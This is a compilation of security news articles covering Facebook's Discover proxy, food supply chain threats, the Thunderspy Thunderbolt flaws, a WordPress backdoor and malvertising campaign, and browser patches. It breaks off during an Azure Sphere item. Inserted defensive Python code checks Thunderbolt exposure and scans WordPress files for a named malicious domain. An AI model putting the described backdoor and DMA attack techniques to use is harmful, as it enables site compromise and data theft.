Facebook Launches ‘Discover,’ A Secure Proxy to Browse the Internet for Free

Free Internet with Facebook Discover Proxy

More than six years after Facebook launched its ambitious Free Basics program to bring the Internet to the masses, the social network is back at it again with a new zero-rating initiative called Discover.

The service, available as a mobile web and Android app, allows users to browse the Internet using free daily data caps.

Facebook Discover is currently being tested in Peru in partnership with local telecom companies such as Bitel, Claro, Entel, and Movistar.

Unlike the regular rich-content browsing, Facebook’s latest connectivity project only provides low-bandwidth text-only based browsing, meaning other forms of data-intensive content such as audio and video are not supported.

Another key differentiator is that it treats all websites equally, whereas users of Free Basics are limited to a handful of sites that are submitted by developers and meet technical criteria set by Facebook.

The move, ultimately, drew criticism for violating principles of net neutrality, leading to its ban in India in 2016.

A Secure Web-Based Proxy

But how does Discover actually work? It is a lot like Free Basics in that all traffic is routed through a proxy. As a result, the device only ever talks to the proxy servers, which act as the “client” to the website the user has requested.

This web-based proxy service runs within a whitelisted domain under “freebasics.com” for which the operator zero-rates traffic (e.g. “https://example.com” is rewritten as “https://https-example-com.0.freebasics.com”); the proxy then fetches the web pages on behalf of the user and delivers them to their device.


“There is extensive server-side logic in place to make sure links and hrefs are correctly transformed,” the company said. “This same logic helps ensure that even HTTP-only sites are delivered securely over HTTPS on Free Basics between the client and the proxy.”

In addition, the cookies used by the websites are stored in encrypted form on the server, to prevent mobile browsers from hitting cookie storage limits. The encryption key (called the internet cookie key, or “ick”) is stored on the client, so the stored cookie contents cannot be read without knowing the user’s key.

“When the client provides the ick, it is forgotten by the server in each request without ever being logged,” Facebook noted.

But allowing JavaScript content from third-party websites also opens up avenues for attackers to inject malicious code, and worse, even lead to session fixation.

To mitigate this, Facebook Discover uses an authentication tag (called “ickt”) derived from the encryption key and a second browser identifier cookie (named “datr”), which is also stored on the client.

The tag, which is embedded in every proxy response, is then compared with the ‘ickt’ on the client side to check for any sign of tampering; on a mismatch, the cookies are deleted. Discover also uses a “two-frame solution” that embeds the third-party site within an inner iframe controlled by an outer frame, which uses the aforementioned tag to ensure the integrity of the content.

For websites that forbid loading in a frame to counter clickjacking attacks, Discover strips that header from the HTTP response, but only after validating the inner frame.

Furthermore, to prevent phishing sites from impersonating the Discover domain, the service blocks navigation attempts to such links by sandboxing the iframe, preventing it from executing untrusted code.
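As an added illustration of the two mechanisms described above (this is example code, not Facebook’s code and not from the original article), the following Python maps an origin URL onto the proxy domain exactly as the article’s example does, and derives and checks the per-response tag on the client side. The article says only that “ickt” is derived from the key and the “datr” cookie; using HMAC-SHA256 for that derivation, treating “ick” as a hex-encoded 32-byte cookie, and folding a non-default port into the hostname label are this example’s own assumptions.

```python
import hashlib
import hmac
from typing import Dict
from urllib.parse import urlsplit, urlunsplit

# Proxy domain suffix taken from the article's example hostname.
PROXY_SUFFIX = ".0.freebasics.com"


def rewrite_to_proxy(url: str) -> str:
    """Map an origin URL onto the proxy's whitelisted domain.

    Mirrors the article's example: https://example.com becomes
    https://https-example-com.0.freebasics.com. Folding the original
    scheme into the hostname is what lets an HTTP-only site be served to
    the client over HTTPS. Port handling is this example's assumption.
    """
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https") or not parts.hostname:
        raise ValueError(f"unsupported origin URL: {url!r}")
    label = f"{parts.scheme}-{parts.hostname.replace('.', '-')}"
    if parts.port:  # assumption: a non-default port becomes one more label segment
        label += f"-{parts.port}"
    # The client <-> proxy leg is always HTTPS, whatever the origin used.
    return urlunsplit(("https", label + PROXY_SUFFIX, parts.path, parts.query, parts.fragment))


def derive_ickt(ick: bytes, datr: str) -> str:
    """Authentication tag bound to the user's cookie key and browser id.

    The article says only that "ickt" is derived from the encryption key
    and the "datr" cookie; HMAC-SHA256 is this example's own choice.
    """
    return hmac.new(ick, datr.encode("utf-8"), hashlib.sha256).hexdigest()


def response_is_untampered(embedded_tag: str, ick: bytes, datr: str) -> bool:
    """Client-side check: recompute the tag and compare in constant time."""
    return hmac.compare_digest(embedded_tag, derive_ickt(ick, datr))


def client_check(cookies: Dict[str, str], embedded_tag: str) -> Dict[str, str]:
    """Apply the article's rule: on a tag mismatch the client drops its cookies.

    "ick" is assumed to be stored hex-encoded; "datr" is the browser identifier.
    """
    try:
        ick = bytes.fromhex(cookies.get("ick", ""))
    except ValueError:
        ick = b""
    datr = cookies.get("datr", "")
    if not ick or not datr or not response_is_untampered(embedded_tag, ick, datr):
        return {}
    return dict(cookies)


if __name__ == "__main__":
    # Constructed values for a stand-alone run.
    print(rewrite_to_proxy("http://example.org/news?id=3"))
    key = bytes(range(32))
    jar = {"ick": key.hex(), "datr": "constructed-browser-id"}
    good = derive_ickt(key, jar["datr"])
    print("intact:", client_check(jar, good) == jar)
    print("tampered:", client_check(jar, "0" * 64) == {})
```

The constant-time comparison matters because the tag is the client’s only evidence that a response came through the proxy unmodified; a plain string comparison would leak, byte by byte, how much of a forged tag was correct.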

“This architecture has been through substantial internal and external security testing,” Facebook’s engineering team concluded. “We believe we have developed a design that is robust enough to resist the types of web application attacks we see in the wild and securely deliver the connectivity that is sustainable for mobile operators.”


via:  thehackernews


Cybersecurity Threats to the Food Supply Chain

When Smithfield Foods closed its Sioux Falls pork processing plant – joining other meat and poultry closures from Tyson Foods, Cargill and JBS USA – headlines suggested that the country was ‘perilously close to the edge’ of food shortages. So, just how safe is the food supply?

The recent closures have been forced by the COVID-19 pandemic. This is likely to be a transient risk, but all modern plants face an ever-present consistent risk from cyber-attack. COVID-19 has merely focused minds on an under-considered risk: how safe is the food supply chain?

It’s a question that needs to be asked. Food supply is a fundamental pillar of ordered societies, and a catastrophic lack of food would rapidly lead to social disorder. This would likely be more rapid and severe in the western democracies that have not experienced serious food shortages for more than 70 years since the end of World War II.

Cyber risk and threat

There is no risk if there is no threat. The first question, then, is whether there is a cyber threat to food supply. Are cyber criminals likely to attack the food industry?

The answer is clearly ‘yes’; and there are at least three obvious channels: hacktivists, cyber-criminal gangs, and nation states. And a fourth, that needs to be mentioned: competitors. “Increased levels of espionage and sabotage from competitors will also heighten as organizations do battle for technological supremacy in this space,” warns Daniel Norman, research analyst with the Information Security Forum (ISF).


There is a growing social movement to use the re-emergence from the COVID lockdown as an opportunity to ‘reboot’ the way society operates. Environmental pollution has dropped rapidly, and nature has recovered from its effects quickly. Environmental activists are calling for governments to invest in green technology as a post-pandemic economic stimulus.

Where this does not happen, and where the old polluting industries revert to their traditional practices, activists are likely to ‘punish’ the worst offenders. This is likely to be two-pronged: environmentalists concerned about increasing pollution, and animal rights activists objecting to the return to mass animal slaughter.

This punishment may come in the form of large-scale DDoS attacks, or even direct attacks against individual plants.

Cyber-criminal gangs

Criminal gangs are driven by two related issues – opportunity and money. The pandemic will have focused attention on the food supply chain, and both issues are apparent. The pandemic will be followed by recession, which could potentially be followed by a deeper depression. Even in the best scenario, there will be many areas of society operating on drastically reduced incomes in the foreseeable future.

The threat is not new. Theft of food has always existed: those who have none are forced to steal from those who have plenty. In the distant past, this was small-scale – effectively petty theft. In the more recent past, criminal gangs have become involved in more large-scale theft from distribution (cargo theft) and warehouses.

This is continuing: recent data from Transported Asset Protection Association (TAPA) suggests that cargo theft has increased by 114% over the last 12 months. On May 3, 2020, FreightWaves reported, “Trucks carrying food and other essentials have been popular with thieves along Mexico’s highways in recent weeks. Cargo theft of trucks has increased 25% during the coronavirus pandemic period, according to a survey conducted by LoJack Mexico.”

Cybercrime, however, could take this to a new level. Entire shipments of food could be redirected and stolen. Entire food companies can be extorted for large sums of money. IT and OT networks can be compromised by ransomware, and the rapid spoilage of food in production would be an incentive to pay the ransom. With much of the food industry comprising small local businesses, it will often become a question of paying up or going under – and this equation will attract additional attackers.

Nation states

The importance of the food supply chain is not lost on the military. In 1812, when Napoleon invaded Russia, the Russian army withdrew but operated a scorched earth policy to deny food supplies to Napoleon’s army. Without supplies, Napoleon was forced to retreat from Moscow, which arguably and ultimately led to his downfall.

“It is a well-known fact,” comments the ISF’s Norman, “that during times of conflict, the party that can destroy the food supply chain will inevitably win. It is therefore conceivable that cyber-attacks from nation state-backed actors and terrorist groups will begin targeting organizations dependent on new technologies, disrupting global supply chains.”

Cyber brings the opportunity of large-scale adversarial interference in food supplies. In military terms this could be a precursor to kinetic warfare, but the cyber age has introduced a new style of cyberwar. The U.S. experienced it in 2016 with Russian interference in the presidential election. The purpose may not have been to directly influence the outcome of the election, but to demoralize the American population. With a demoralized population, a nation’s effectiveness on the world stage is inevitably weakened.

“One way to weaken your adversary is to cause internal conflict,” added IOActive’s Sheehy. “Well, you can survive about three minutes without air, three days without water, and about three weeks without food. People will riot very quickly if they cannot get food. Even in this relatively civilized COVID lockdown, the stresses on the food supply chain have caused very high tensions among people.”

Continued interruption to the food supply chain would inevitably demoralize the population. In extreme circumstances it would lead to rioting in the streets and food looting. The possibility of such a threat from an adversarial nation should not be ignored.

The security of the food supply chain

The food industry is no different from any other industry: it has undergone rapid evolution into the fourth industrial revolution. IT and OT are converging, and OT uses the same ICS devices, with the same vulnerabilities, as other industries. The same priority of continued production over updating systems prevails, and Windows 98 is still found in use. But even as older, vulnerable systems remain in service, the industry is adopting new and not yet battle-tested technology: advanced sensors, robotics, drones and autonomous vehicles.

“One of the trends we see broadly in the food industry,” comments Sheehy, “is a move towards more automation. Partly this is a response to the pandemic – robots won’t be sent home in any similar or repeated scenario. Labor is more of a business risk than robots. However, moving to more significant automation is going to change the risk profile in a way that a lot of organizations haven’t formerly had to manage – operational technology has not been considered a high-risk priority.”

It is exacerbated, added Matt Rahman (IOActive’s COO), “by the structure of the industry. About 74% of food manufacturers have fewer than 20 employees. About 97% have fewer than 500 employees. They don’t have the staff or the expertise to properly manage their cyber security.”

It is also worth noting that the food supply chain is more complex than the supply chains for most industries. Elsewhere, the supply chain primarily comprises third-party suppliers, product or parts delivery, and the manufacturer. With food it is third party suppliers (normally farmers), product delivery, food processing (the manufacturer), and then a further complex distribution to groceries/supermarkets and/or consumer. Each stage of this chain can be threatened.

“Technology adoption has skyrocketed in virtually every segment of our agriculture sector including food production, processing, and distribution,” comments Parham Eftekhari, founder and chairman of the Institute for Critical Infrastructure Technology (ICIT), “and experts predict this trend to continue with robotics and self-driving freight carriers paving the way for an autonomous future. This creates significant opportunity for disruption to our supply chain and food safety concerns.”

He continued, “Today, we are already hearing stories of processing plants shutting down and the potential of food shortages. What if manufacturing and storage facilities of perishable food products have their cooling systems hacked during a time of a national food shortage? It would only take a handful of high-profile attacks to create panic among citizens that could lead to a rush on grocery stores and threaten an already fragile food supply.”

The food industry supply chain is vulnerable at every stage. “Farmers are using GPS technology and robotics to custom fertilize and plant their land to optimize yield,” said Eftekhari. “What if these systems are hacked – without their knowledge – resulting in crops that underperform expectations across the nation?”

Norman added, “5G environments will enable precision agriculture and farming at the individual crop or livestock level but will use poorly secured IoT devices and drones to monitor soil fertilization, nitrogen levels, pest control, water and sunlight requirements. Automated robotic combine harvesters will operate on private 5G networks, with machine learning systems calculating and monitoring optimum conditions across larger and interconnected ecosystems. The danger of attacks on the integrity of information could significantly alter the production process.”

At a local level, this could be a punitive attack by a hacktivist group objecting to use of certain pesticides, or genetically modified crops in general. “The agricultural industry is one of the biggest contributors to greenhouse gas emissions in the world,” says Norman. “Extreme levels of methane, nitrous oxide output and water usage consistently make them a prime target for activism. With greater dependency on technology, hacktivists will turn their attention to disrupting the technology underpinning the supply chain.”

At a national level, as part of modern geopolitical disruption, the aim could be to reduce yields in complete crops – shortages in wheat, corn and soybean crops would be both economically and socially damaging.

Distribution, both from farmer to processor and from processor to distributor, has long been subject to cargo theft by criminals – and the cyber element is growing. “Criminals hack into distribution firms,” comments IOActive’s Rahman, “to learn about shipments, create false invoices, bills of lading and manifests to falsify delivery/collection times when they can simply pick up the stolen cargo.”

The food processing plant is the obvious primary target for cyber criminals, especially for extortion. Ransomware is already targeting manufacturing. “Today, we are hearing stories of processing plants shutting down and the potential of food shortages,” said Eftekhari. “What if manufacturing and storage facilities of perishable food products have their cooling systems hacked during a time of a national food shortage? It would only take a handful of high-profile attacks to create panic among citizens that could lead to a rush on grocery stores and threaten an already fragile food supply.”

Here the worst scenario might come from terrorist groups rather than nation-states or criminal gangs. The motivation would be to seek harm rather than sow discord or acquire money. Such groups would be worried about neither attribution nor retribution, but could seek to break into processing plants either to damage equipment or poison supplies.

Beyond the processing plant, the food supply chain continues to the sales outlets. For now, the threat is physical redirection or old-fashioned cargo theft. This will change in future years as more and more supplies are delivered by autonomous trucks. Autonomous vehicles are proven to be hackable. Experts expect the recent trend of the food industry adopting new technology to continue, warns Eftekhari, “with robotics and self-driving freight carriers paving the way for an autonomous future. This creates significant opportunity for disruption to our supply chain and food safety concerns.”

But the threat already exists with current connected trucks. “The heavy vehicle cabs are exposed to potential cyber-attack,” warns Sheehy, “as well as their refrigerated trailers. The more modern refrigerated trailers often have their own monitoring systems which can be remotely accessible over mobile networks. They are also often attached to the controller area network (CAN bus) of the vehicle, providing a potential attack point to compromise the overall security of the vehicle.”

The COVID-19 pandemic has highlighted the fragility of the global food chain. This fragility will not be lost on cyber criminals. As the world moves from pandemic lockdown to economic recession, criminals will almost certainly look closely at the food supply chain as a means of making money. The risk is not to any one specific part of the chain nor any one type of criminal – the whole chain is at risk.

“If an attacker wants to provide some type of disruption to the food supply, one area could be transportation; a second is in food processing; but a third would be in food safety,” says Sheehy. “If the cold storage facility is not kept at the appropriate temperature, products will spoil. Even though different parts of the supply chain may have successfully done the production, the transportation and processing securely, you may still be in a situation where you have a constraint on supply due to a compromise in the integrity of the safety processes.”

via:  securityweek


Cynet Offers IR Specialists Grants up to $1500 for each IR Engagement

Cynet, the autonomous breach protection company, recently announced that it was making its Cynet 360 threat detection and response platform available at no charge to incident response (IR) service providers and consultants.

Today Cynet takes another step and announces a $500 grant for incident responders for each IR engagement in which Cynet 360 was used, with an additional $1,000 grant if the customer purchases an annual Cynet 360 subscription after the IR process has concluded.
Learn about this new offering here.

Incident response investigations come in a thousand different variations, but most can be broken down into two main parts. The first is discovering the few suspicious machines, user accounts, and network connections out of the mass activities within the attacked environment.

The second part follows these discoveries and involves a surgical-like collection and analysis of forensic artifacts to refute or validate the suspicion and if validated to disclose the full attack root cause and impact.

While IR pros have a wide array of commonly used open-source tools to perform a deep dive forensic investigation on a single or few suspicious machines, there is a crying shortage of available tools for the first part.

That’s mainly because finding the proverbial compromised needle in a haystack of a mostly uncompromised environment requires complete visibility into process execution, network traffic and user activity across the whole environment.

This is where Cynet 360 comes in. With an enterprise-grade distribution infrastructure providing seamless deployment across thousands of endpoints in minutes, Cynet 360 empowers responders to effortlessly gain the required visibility into the initial part of the investigation, easily pinpointing the entities that should be further investigated.

Cynet 360 provides incident responders with the following capabilities that cover both the investigation and the remediation parts of the response process.

Full Environment Visibility
  • Gain instant visibility into any host, file, process, log, network traffic and user activity.
  • Get a verdict, attack scope, and all indicators immediately.
  • Use Cynet’s central management to distribute other open source IR tools across the environment.
Precise Threat Knowledge
  • Get real-time, accurate threat knowledge auto-generated by the Cynet 360 correlation engine.
  • For deep-dive investigations, leverage granular forensic tools to conduct an end-to-end investigation to determine the attack’s scope and impact.
  • Trust your own skills and hunt proactively.
Complete Recovery Actions
  • Isolate infected hosts, disable compromised user accounts, remove malicious files, and block risky network connections.
  • Craft your own remediation policies for automated threat block and removal.

Learn more about this new offering for incident responders here.

via:  thehackernews


7 New Flaws Affect All Thunderbolt-equipped Computers Sold in the Last 9 Years

A cybersecurity researcher today revealed a set of seven new, unpatchable hardware vulnerabilities that affect all desktops and laptops sold in the past nine years with Thunderbolt or Thunderbolt-compatible USB-C ports.

Collectively dubbed ‘ThunderSpy,’ the vulnerabilities can be exploited in 9 realistic evil-maid attack scenarios, primarily to steal data or read/write all of the system memory of a locked or sleeping computer—even when drives are protected with full disk encryption.

In a nutshell, if you think someone with a few minutes of physical access to your computer—regardless of the location—can cause any form of significant harm to you, you’re at risk for an evil maid attack.

According to Björn Ruytenberg of the Eindhoven University of Technology, the ThunderSpy attack “may require opening a target laptop’s case with a screwdriver, [but] it leaves no trace of intrusion and can be pulled off in just a few minutes.”

In other words, the flaw is not linked to the network activity or any related component, and thus can’t be exploited remotely.

“Thunderspy works even if you follow best security practices by locking or suspending your computer when leaving briefly, and if your system administrator has set up the device with Secure Boot, strong BIOS and operating system account passwords, and enabled full disk encryption,” the researcher said.

Besides any computer running Windows or Linux, Thunderbolt-equipped Apple MacBooks sold since 2011 (except Retina models) are also vulnerable to Thunderspy, though only partially.

ThunderSpy Vulnerabilities

The following list of seven Thunderspy vulnerabilities affects Thunderbolt versions 1, 2 and 3, and can be exploited to create arbitrary Thunderbolt device identities, clone user-authorized Thunderbolt devices, and finally, obtain PCIe connectivity to perform DMA attacks.

  1. Inadequate firmware verification schemes
  2. Weak device authentication scheme
  3. Use of unauthenticated device metadata
  4. Downgrade attack using backward compatibility
  5. Use of unauthenticated controller configurations
  6. SPI flash interface deficiencies
  7. No Thunderbolt security on Boot Camp

For those unaware, direct memory access (DMA) attacks against the Thunderbolt port are not new and have previously been demonstrated with the ThunderClap attacks.

DMA-based attacks let attackers compromise targeted computers in a matter of seconds just by plugging a malicious hot-plug device—such as an external network card, mouse, keyboard, printer, or storage device—into a Thunderbolt port or the latest USB-C port.

In brief, DMA attacks are possible because the Thunderbolt port operates at a very low level with highly privileged access to the computer, allowing connected peripherals to bypass operating system security policies and directly read/write system memory, which may contain sensitive information including passwords, banking logins, private files, and browser activity.


To prevent DMA attacks, Intel introduced some countermeasures, one of which is ‘security levels’, which prevents unauthorized Thunderbolt PCIe-based devices from connecting without user authorization.

“To further strengthen device authentication, the system is said to provide ‘cryptographic authentication of connections’ to prevent devices from spoofing user-authorized devices,” the researcher said.

However, by combining the first three Thunderspy flaws, an attacker can break the ‘security levels’ feature, and load an unauthorized malicious Thunderbolt device by forging Thunderbolt device identities, as shown in a video demonstration shared by Ruytenberg.

“Thunderbolt controllers store device metadata in a firmware section referred to as Device ROM (DROM). We have found that the DROM is not cryptographically verified. Following from the first issue, this vulnerability enables constructing forged Thunderbolt device identities,” he added.

“In addition, when combined with the second issue, forged identities may partially or fully comprise arbitrary data.”

“In addition, we show unauthenticated overriding of Security Level configurations, including the ability to disable Thunderbolt security entirely, and restoring Thunderbolt connectivity if the system is restricted to exclusively passing through USB and/or DisplayPort,” he added.

“We conclude this report by demonstrating the ability to permanently disable Thunderbolt security and block all future firmware updates.”

According to Ruytenberg, some recent systems, available since 2019, include Kernel DMA Protection, which partially mitigates the Thunderspy vulnerabilities.

To know if your system is affected by Thunderspy vulnerabilities, Ruytenberg has also released a free and open-source tool, called Spycheck.
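As an added defender-side check (this is example code, not part of the article and not Ruytenberg’s Spycheck tool), the following Python reads the Thunderbolt host’s security level and Kernel DMA Protection status from the Linux sysfs attributes `/sys/bus/thunderbolt/devices/domain0/security` and `.../iommu_dma_protection` (the kernel’s documented attribute names) and classifies the exposure along the lines the article describes. The assessment function is kept separate from the file reads so it can be run on readings gathered elsewhere; the exposure ratings are this example’s own judgement.

```python
from pathlib import Path
from typing import Dict, Optional, Union

# Linux exposes the Thunderbolt host controller ("domain") under sysfs;
# the attribute names used below are the kernel's documented ones.
SYSFS_DOMAIN = Path("/sys/bus/thunderbolt/devices/domain0")

# Values the kernel reports in the 'security' attribute, grouped by what
# they rely on. 'none'/'user'/'secure' permit PCIe tunneling; the rest
# restrict the port to DisplayPort and/or USB.
RELIES_ON_DEVICE_AUTH = {"user", "secure"}
PCIE_TUNNELING_OFF = {"dponly", "usbonly", "nopcie"}


def read_attr(root: Path, name: str) -> Optional[str]:
    """Read one sysfs attribute, or None if it is absent."""
    try:
        return (root / name).read_text().strip()
    except OSError:
        return None


def assess(security: Optional[str], iommu_dma_protection: Optional[str]) -> Dict[str, str]:
    """Classify exposure to the Thunderspy chain from the two readings.

    Returns {'exposure': low|medium|high|unknown, 'reason': ...}; the
    ratings are this example's judgement based on the article.
    """
    if security is None:
        return {"exposure": "unknown",
                "reason": "no Thunderbolt domain found (no Thunderbolt host, or driver not loaded)"}
    if iommu_dma_protection == "1":
        return {"exposure": "low",
                "reason": "Kernel DMA Protection (IOMMU) is active; the article says this partially mitigates Thunderspy"}
    if security == "none":
        return {"exposure": "high",
                "reason": "Security Level 'none': any attached device gets PCIe without authorization"}
    if security in RELIES_ON_DEVICE_AUTH:
        return {"exposure": "high",
                "reason": f"Security Level '{security}' relies on device authentication, "
                          "which the first three Thunderspy flaws defeat by forging device identities"}
    if security in PCIE_TUNNELING_OFF:
        return {"exposure": "medium",
                "reason": f"Security Level '{security}' disables PCIe tunneling, but the research shows "
                          "unauthenticated controller configuration changes can restore it"}
    return {"exposure": "unknown", "reason": f"unrecognised Security Level {security!r}"}


def assess_host(root: Union[str, Path] = SYSFS_DOMAIN) -> Dict[str, str]:
    """Read the live sysfs attributes and assess them."""
    root = Path(root)
    return assess(read_attr(root, "security"), read_attr(root, "iommu_dma_protection"))


if __name__ == "__main__":
    result = assess_host()
    print(f"{result['exposure']}: {result['reason']}")
```

Run it as root or any user that can read sysfs; on a machine without Thunderbolt the verdict is simply “unknown”. Whatever it reports, the article’s operational advice still applies: a powered-off or hibernated machine has no memory contents for a DMA device to read.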

Interestingly, when the researcher reported Thunderspy vulnerabilities to Intel, the chip company revealed it had already been aware of some of them—with no plans to patch or disclose it to the public.

Ruytenberg claims to have found more potential vulnerabilities in the Thunderbolt protocol, which are part of ongoing research and are expected to be revealed soon as ‘Thunderspy 2.’

In conclusion, if you consider yourself a potential target of evil-maid attacks and carry a Thunderbolt system with you, avoid leaving your devices unattended, power off the system completely, or at least consider using hibernation instead of sleep mode.

Besides this, if you want to be more paranoid, avoid leaving your Thunderbolt peripherals unattended or lending them to anybody.

via:  thehackernews


Google Authenticator Users Can Now Transfer 2SV Secrets Between Devices

Google announced that Google Authenticator users can now transfer 2-Step Verification (2SV) secrets between devices.

The new feature is meant to make it easier for users to manage their Google Authenticator 2SV codes across multiple devices.

The 2SV secrets represent the data that is used to generate 2SV codes across devices that have Google Authenticator installed. With the new feature, users can transfer the data to a new device when upgrading, Google says.

The much anticipated feature is now available in the latest version of Google Authenticator on Android (version 5.10), the Internet company announced.

“Using 2SV, 2-Factor Authentication (2FA) or Multi-Factor Authentication (MFA) is critical to protecting your accounts from unauthorized access. With these mechanisms, users verify their identity through their password and an additional proof of identity, such as a security key or a passcode,” Google said.

Google Authenticator aims not only to provide an easy way to use 2SV on accounts, but also to improve the security of the login process, compared to options such as receiving passcodes via text messages.

To ensure that users can keep their accounts safe, Google also took a series of measures to minimize the attack surface in spite of the newly announced feature.

Thus, no data is sent to Google’s servers when the user transfers 2SV secrets, as the communication takes place between the two devices only.

“Your 2SV secrets can’t be accessed without having physical access to your phone and the ability to unlock it,” the Internet giant notes.

Furthermore, alerting mechanisms and in-app logs were implemented, so as to make users fully aware of the fact that the transfer function has been used.

via:  securityweek


Nearly 1 Million WordPress Sites Targeted via Old Vulnerabilities

A large-scale attack campaign has targeted over 900,000 WordPress websites through vulnerabilities in plugins and themes, WordPress security company Defiant revealed this week.

The attacks were initially discovered on April 28, but showed a massive spike on May 3, when more than half a million websites were hit. Likely the work of a single threat actor, the campaign is aimed at injecting the target websites with malicious JavaScript designed to redirect visitors to malvertising sites.

Responsible for only a small volume of attacks in the past, the threat actor has ramped up the operation, with over 20 million attacks registered on May 3. The researchers discovered that, over the past month, over 24,000 distinct IP addresses were used to attack more than 900,000 sites.

“Due to the sheer volume and variety of attacks and sites that we’ve seen targeted, it is possible that your site may be exposed to these attacks, and the malicious actor will likely pivot to other vulnerabilities in the future,” Defiant says.

The targeted vulnerabilities are not new and have been abused in previous attacks as well. These include Cross-Site Scripting (XSS) vulnerabilities in the Easy2Map plugin (removed from the WordPress repository in August 2019), Blog Designer (patched in 2019), and Newspaper theme (patched in 2016), and options update bugs in WP GDPR Compliance (patched in late 2018), and Total Donations (removed in early 2019).

“Although it is not readily apparent why these vulnerabilities were targeted, this is a large scale campaign that could easily pivot to other targets,” Defiant says.

The JavaScript code the attackers attempt to insert into the targeted websites is located at count[.]trackstatisticsss[.]com/stm and also checks whether the victim has any WordPress login cookies set. The attackers hope that the script would be executed in an administrator’s browser.

If the visitor is not logged in as an administrator and is not on the login page, the script redirects them to a malvertising site. Otherwise, it attempts to inject a malicious PHP backdoor into the current theme’s header, along with a second malicious JavaScript.

The backdoor downloads another payload from https://stat[.]trackstatisticsss[.]com/n.txt and attempts to execute it by including it in the theme header.

“This method would allow the attacker to maintain control of the site, as they could simply change the contents of the file at https://stat[.]trackstatisticsss[.]com/n.txt to code of their choice which could be used to embed a webshell, create a malicious administrator, or even delete the entire contents of the site,” Defiant says.

The final payload used in this attack was designed to prepend a variant of the initial script to every JavaScript file on the site, as well as to all .htm, .html, and .php files named “index.” It also rechecks the infected site every 6,400 seconds and re-infects it if necessary.

Site owners are advised to keep all of their plugins updated and to deactivate and delete those plugins that have been removed from the WordPress plugin repository, to ensure their websites are protected.
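As an added detection aid (example code, not Defiant’s and not from the original article), the following Python scans a WordPress install for the indicator the report gives, the trackstatisticsss[.]com domain, in exactly the files the final payload is said to touch: every .js file, index.htm/.html/.php files, and the theme’s header.php. A hit near the start of a file is flagged as consistent with the “prepend” behaviour described. The file-type rules, the 200-byte “leading” threshold and the sample contents in the stand-alone run are this example’s own constructions.

```python
import os
import tempfile
from pathlib import Path
from typing import Dict, List

# Indicator from the Defiant write-up (written defanged there). Matching the
# bare domain catches both the count.* and stat.* hosts it names.
IOC_DOMAINS = ("trackstatisticsss.com",)

# A match this early in a file is consistent with the payload prepending itself.
LEADING_BYTES = 200


def is_target_file(path: str) -> bool:
    """Files the article says the payload modifies (rules are this example's)."""
    p = Path(path)
    ext = p.suffix.lower()
    if ext == ".js":
        return True
    if ext in (".htm", ".html", ".php") and p.stem.lower() == "index":
        return True
    return p.name.lower() == "header.php"


def scan_text(path: str, text: str) -> List[Dict[str, object]]:
    """Return one finding per indicator present in a file's contents."""
    findings: List[Dict[str, object]] = []
    if not is_target_file(path):
        return findings
    for domain in IOC_DOMAINS:
        offset = text.find(domain)
        if offset == -1:
            continue
        findings.append({"path": path, "indicator": domain,
                         "offset": offset, "prepended": offset < LEADING_BYTES})
    return findings


def scan_tree(root: str) -> List[Dict[str, object]]:
    """Walk a WordPress document root and scan every target file."""
    findings: List[Dict[str, object]] = []
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            full = os.path.join(dirpath, name)
            if not is_target_file(full):
                continue
            try:
                text = Path(full).read_text(encoding="utf-8", errors="ignore")
            except OSError:
                continue
            findings.extend(scan_text(os.path.relpath(full, root), text))
    return findings


if __name__ == "__main__":
    # Constructed sample site: one injected header, one clean index, one
    # script with the loader prepended.
    with tempfile.TemporaryDirectory() as root:
        theme = Path(root, "wp-content", "themes", "sample")
        theme.mkdir(parents=True)
        (theme / "header.php").write_text(
            "<?php /* constructed */ ?>\n<script src=\"https://count.trackstatisticsss.com/stm\"></script>\n")
        (theme / "index.php").write_text("<?php get_header(); ?>\n")
        js = Path(root, "wp-includes", "js")
        js.mkdir(parents=True)
        (js / "app.js").write_text(
            "var s=document.createElement('script');s.src='https://count.trackstatisticsss.com/stm';\n"
            "function legit(){return 1;}\n")
        for f in scan_tree(root):
            print(f"{f['path']}: {f['indicator']} at byte {f['offset']} (prepended={f['prepended']})")
```

Because the backdoor re-checks the site every 6,400 seconds and re-infects it, a single clean-up is not enough: rerun the scan after removing the vulnerable plugin and rotating administrator credentials, and treat any repeat hit as a sign the initial access path is still open.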

via: securityweek


Firefox 76 Brings Security Patches, Breached Password Alerts

Mozilla this week released Firefox 76 to the stable channel with an updated password manager, alerts for breached passwords, and patches for 11 vulnerabilities.

Starting with the new release, the browser aims to help users better keep their accounts secure and easily generate strong passwords, courtesy of the new Firefox Lockwise password manager.

On shared devices, the feature keeps passwords secure by prompting users for their account password before making saved logins available to them. Furthermore, the credentials are made available for five minutes only, Mozilla says.

The Lockwise dashboard, the browser maker explains, is powered by Firefox Monitor, which alerts users when their credentials were part of a data breach.

Firefox alerts users when one of the passwords they use is identical to a password that has been compromised, and also when the username and password were part of a breach (additional details about the breach are included).

“Don’t worry, Firefox doesn’t know your actual passwords. This new feature automatically checks your encrypted list of passwords against the breached website information, helping you to stay on top of your online accounts that may have been compromised,” Mozilla explains.

The organization also points out that users can now leverage Firefox Lockwise to generate passwords of a minimum of 12 random letters, numbers and symbols.

Furthermore, Mozilla has made Firefox Lockwise available for iOS and Android as well, allowing users to access their passwords while on the go and easily sync their logins.

Firefox 76 also arrived with patches for 11 vulnerabilities, including three assessed with a critical severity rating.

The first of the critical bugs is a use-after-free during worker shutdown (CVE-2020-12387), which could lead to an exploitable crash, the second is a sandbox escape (CVE-2020-12388) that impacts Windows only, while the third (CVE-2020-12395) refers to memory safety bugs in both Firefox 75 and Firefox ESR 68.7.

The new browser release also patches three high severity issues (CVE-2020-12389 – sandbox escape; CVE-2020-6831 – buffer overflow; and CVE-2020-12396 – memory safety bugs), four moderate risk bugs (CVE-2020-12390 – incorrect serialization; CVE-2020-12391 – Content-Security-Policy bypass; CVE-2020-12392 – arbitrary local file access; CVE-2020-12393 – potential command injection), and one low severity issue (CVE-2020-12394 – URL spoofing in location bar when unfocussed).

This week, Google also released an update for its Chrome browser, addressing a total of three vulnerabilities, including two reported by external researchers. Both of these bugs are high severity issues: CVE-2020-6831 – a stack buffer overflow in SCTP, and CVE-2020-6464 – type confusion in Blink.

via:  securityweek


Microsoft Offering Up to $100,000 for Vulnerabilities in Azure Sphere

Microsoft announced a new security research challenge that encourages white hat hackers to find and responsibly disclose vulnerabilities in the company’s Azure Sphere solution.

Azure Sphere is an IoT security solution designed to provide end-to-end security across hardware, operating system and the cloud.

